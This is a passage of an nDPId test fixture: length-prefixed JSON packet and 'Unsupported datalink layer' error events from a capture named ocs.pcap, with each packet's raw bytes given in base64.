-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":274,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQHAMQABABm64wKi0AkDppl+6uwG7gNP32xI082ewEADl+h8AAAEBCAoANYc8AMsH6wEBBQoSNPjTEjUBhw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":275,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798557} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":275,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANHANQABABm7DwKi0AkDppl+6uwG7gNP32xI1AYeAEAESP+YAAAEBCAoANYdEAMsIqw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":276,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798615} -00501{"packet_event_id":1,"packet_event_name":"packet","packet_id":276,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":186,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":186,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAunAOQABABm48wKi0AkDppl+6uwG7gNP32xI1AYeAGAESyy0AAAEBCAoANYdKAMsIqxYDAQBGEAAAQkEERW4InoLmmETsmbq7iNYq\/uNoJjfYZ7GrVbCgL+pMTKvYUbYVc42GhfBm5bJZLifeIScwh0Es60NTSZBLNuKx6hQDAQABARYDAQAwP+gkOxQQZv5+tK2pbv10GSaJPvtkOm9t6GPFVbw4WeGoA4IHJkkluw15ri+Pcw3x"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":277,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798665} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":277,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANHAPQABABm7BwKi0AkDppl+6uwG7gNP4YRI1AcKAEAESPqMAAAEBCAoANYdOAMsJIw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":278,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798683} -01137{"packet_event_id":1,"packet_event_name":"packet","packet_id":278,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":649,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":649,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQACiXAQQABABmxrwKi0AkDppl+6uwG7gNP4YRI1AcKAGAESmlcAAAEBCAoANYdQAMsJIxcDAQJQtYB8KceZcX537qxqxSeHK6h3g94pz350VSgCUaq6kyHRu\/ujOAK44PaoYsIkwvMkPdw\/SInfY\/vx8JrDAidotcWdlNsEJMy9dXo9pMd40Jqbtwq\/LtEfd5PwCyCX2bP+OOBO290j\/3SVrGprv7t+gW4fg1nyKr4WbHMTVahOqWzzDiROFa40b1rNESXI3kDBrleOyVynSWiz9BRu8jM6grVD6EPM9FIVJCaDld4xb2XlNWkdt2tX\/7nYXXrC5bAv1eb\/rBJYwaFY2uf9A0C9+BsIZy4x9XIYr2bwiGw65DWYo+LwdqMH0DXtHhhbrMC80GWY153ZH\/bULV\/hjuOc3lTzjKsSgRMRUqMWCe1ob+dCeLIbhuNO2bICDSK8uoTc53tYtgvn46iMKP1Xgra\/14uoiuHF\/0pKyfwTDYU02kpKOTVYhNy4pYMUMpAR0FK1V1nHL0BrmjJSGytBkPo\/gBON5OC\/Ewt4MOze3uiZf1vqR8ncqxLr6pyPcTO6Hqb9VZxwjtesZRXZUZ+YnE\/LD4MuUjxcckBDmCjSHFM12kx0FN\/lj++BDCdMHTo+2gxh3p3gxdgptwCv5ybFi3t0KGt0wt3eB9jHTbWDvoiVCFposaKUpqKXMqXJe5otBMMJKXCnuabbnJEQOVdtTlsedvkpqA39eVzMfSZ2x4wd45NFW0LmK1iivY3N2ujwGCBXNYs4C\/9+CQGKUpZUdBB\/PjSNu5EwrqhBnb785VOxOuhIe8hU1ynbqL7reEoA9ZJC62UmMRLT8TL9GJPJYtDIEA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":279,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798795} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":279,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANHARQABABm6\/wKi0AkDppl+6uwG7gNP6thI1A7eAEAE9OdwAAAEBCAoANYdcAMsJZw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":280,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798803} -00372{"packet_event_id":1,"packet_event_name":"packet","packet_id":280,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":89,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":89,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAWXASQABABm6ZwKi0AkDppl+6uwG7gNP6thI1A7eAGAE9JTsAAAEBCAoANYdcAMsJZxUDAQAgq\/9CYFvXrcQVyGdxSYtUugliMMXMg2CdqVJvhJ\/MPXc="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":281,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798887} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":281,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANHATQABABm69wKi0AkDppl+6uwG7gNP62xI1A7iAEAE9OTYAAAEBCAoANYdlAMsJ3g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":282,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798978} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":282,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGHQABABoFWwKi0ArL40DbC2QBQ64tGkd7p1qewEBGvOZcAAAEBCAoANYduRwYInAEBBQre6dwT3unhfw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":283,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799043} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":283,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGIQABABoFVwKi0ArL40DbC2QBQ64tGkd7p1qewEBGvNCUAAAEBCAoANYd0RwYInAEBBQre6dwT3unm6w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":284,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799045} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":284,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGJQABABoFUwKi0ArL40DbC2QBQ64tGkd7p1qewEBGvLrgAAAEBCAoANYd1RwYInAEBBQre6dwT3unsVw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":285,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799110} -00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":285,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMGKQABABoFLwKi0ArL40DbC2QBQ64tGkd7p1qfQEBGvfYoAAAEBCAoANYd7RwYInAEBBRLe6ebr3unsV97p3BPe6exX"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":286,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799112} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":286,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGLQABABoFSwKi0ArL40DbC2QBQ64tGkd7p1qewEBGvKUYAAAEBCAoANYd7RwYInAEBBQre6dwT3unxww=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":287,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799197} -00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":287,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMGMQABABoFJwKi0ArL40DbC2QBQ64tGkd7p1qfQEBGvV40AAAEBCAoANYeERwYInAEBBRLe6fcv3un8m97p3BPe6fHD"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":288,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799259} -00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":288,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMGNQABABoFIwKi0ArL40DbC2QBQ64tGkd7p1qfQEBGvUhsAAAEBCAoANYeKRwYInAEBBRLe6fcv3uoCB97p3BPe6fHD"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":289,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799313} -00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":289,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMGOQABABoFHwKi0ArL40DbC2QBQ64tGkd7p1qfQEBGvTKoAAAEBCAoANYePRwYInAEBBRLe6fcv3uoHc97p3BPe6fHD"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":290,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799378} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":290,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGPQABABoFOwKi0ArL40DbC2QBQ64tGkd7p8cOwEBHd3K8AAAEBCAoANYeWRwYJAQEBBQre6fcv3uoHcw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":291,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799447} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":291,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGQQABABoFZwKi0ArL40DbC2QBQ64tGkd7qB3OAEBIKuUkAAAEBCAoANYedRwYJEg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":292,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799448} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":292,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGRQABABoFYwKi0ArL40DbC2QBQ64tGkd7qDN+AEBI3s7AAAAEBCAoANYedRwYJEg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":293,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799507} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":293,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGSQABABoFLwKi0ArL40DbC2QBQ64tGkd7qDN+wEBI3lbsAAAEBCAoANYejRwYJEgEBBQre6hJL3uoXtw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":294,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799509} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":294,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGTQABABoFKwKi0ArL40DbC2QBQ64tGkd7qDN+wEBI3kE8AAAEBCAoANYejRwYJEgEBBQre6hJL3uodIw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":295,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799564} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":295,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGUQABABoFJwKi0ArL40DbC2QBQ64tGkd7qDN+wEBI3it4AAAEBCAoANYeoRwYJEgEBBQre6hJL3uoijw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":296,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799566} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":296,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGVQABABoFIwKi0ArL40DbC2QBQ64tGkd7qDN+wEBI3hXEAAAEBCAoANYepRwYJEgEBBQre6hJL3uon+w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":297,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799631} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":297,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGWQABABoFTwKi0ArL40DbC2QBQ64tGkd7qJ\/uAEBJkmCcAAAEBCAoANYevRwYJQA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":298,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799689} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":298,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGXQABABoFGwKi0ArL40DbC2QBQ64tGkd7qJ\/uwEBJkQ\/oAAAEBCAoANYe1RwYJQAEBBQre6i1n3uoy0w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":299,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799739} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":299,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGYQABABoFFwKi0ArL40DbC2QBQ64tGkd7qJ\/uwEBJkPokAAAEBCAoANYe6RwYJQAEBBQre6i1n3uo4Pw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":300,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799771} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":300,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGZQABABoFEwKi0ArL40DbC2QBQ64tGkd7qJ\/uwEBJkORoAAAEBCAoANYe9RwYJQAEBBQre6i1n3uo9qw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":301,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799813} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":301,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGaQABABoFPwKi0ArL40DbC2QBQ64tGkd7qPauAEBKSggMAAAEBCAoANYfBRwYJdA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":302,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799813} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":302,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGbQABABoFOwKi0ArL40DbC2QBQ64tGkd7qQxeAEBK\/fGoAAAEBCAoANYfBRwYJdA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":303,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799853} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":303,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGcQABABoFNwKi0ArL40DbC2QBQ64tGkd7qSIOAEBLsdsMAAAEBCAoANYfFRwYJfg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":304,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799856} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":304,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGdQABABoFMwKi0ArL40DbC2QBQ64tGkd7qTe+AEBMZcSkAAAEBCAoANYfFRwYJfw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":305,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799856} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":305,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGeQABABoFLwKi0ArL40DbC2QBQ64tGkd7qU1uAEBNHa48AAAEBCAoANYfFRwYJfw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":306,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799880} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":306,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGfQABABoFKwKi0ArL40DbC2QBQ64tGkd7qWMeAEBN0ZeoAAAEBCAoANYfIRwYJiA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":307,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799886} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":307,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGgQABABoFJwKi0ArL40DbC2QBQ64tGkd7qXjOAEBOhYE4AAAEBCAoANYfJRwYJig=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":308,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799887} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":308,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGhQABABoFIwKi0ArL40DbC2QBQ64tGkd7qY5+AEBPOWrUAAAEBCAoANYfJRwYJig=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":309,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799914} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":309,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGiQABABoFHwKi0ArL40DbC2QBQ64tGkd7qaQuAEBP8VRMAAAEBCAoANYfLRwYJkA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":310,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799917} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":310,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGjQABABoFGwKi0ArL40DbC2QBQ64tGkd7qbneAEBQpT3gAAAEBCAoANYfMRwYJkQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":311,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800246} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":311,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGkQABABoFFwKi0ArL40DbC2QBQ64tGkd7qc+OAEBRWSXkAAAEBCAoANYftRwYJ1g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":312,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800313} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":312,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGlQABABoE4wKi0ArL40DbC2QBQ64tGkd7qc+OwEBRWUqMAAAEBCAoANYfzRwYJ1gEBBQre6n673uqEJw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":313,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800314} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":313,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGmQABABoE3wKi0ArL40DbC2QBQ64tGkd7qc+OwEBRWTTcAAAEBCAoANYfzRwYJ1gEBBQre6n673uqJkw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":314,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800397} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":314,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGnQABABoE2wKi0ArL40DbC2QBQ64tGkd7qc+OwEBRWUpsAAAEBCAoANYf7RwYJ1gEBBQre6nlP3uqJkw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":315,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800400} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":315,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGoQABABoE1wKi0ArL40DbC2QBQ64tGkd7qc+OwEBRWTS4AAAEBCAoANYf8RwYJ1gEBBQre6nlP3uqO\/w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":316,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800470} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":316,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMGpQABABoEswKi0ArL40DbC2QBQ64tGkd7qc+PQEBRWQP4AAAEBCAoANYgDRwYJ1gEBBRLe6pRr3uqZ197qeU\/e6o7\/"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":317,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800543} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":317,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMGqQABABoErwKi0ArL40DbC2QBQ64tGkd7qc+PQEBRWO4sAAAEBCAoANYgKRwYJ1gEBBRLe6pRr3uqfQ97qeU\/e6o7\/"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":318,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800617} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":318,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMGrQABABoEqwKi0ArL40DbC2QBQ64tGkd7qc+PQEBRWNhcAAAEBCAoANYgSRwYJ1gEBBRLe6pRr3uqkr97qeU\/e6o7\/"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":319,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800636} 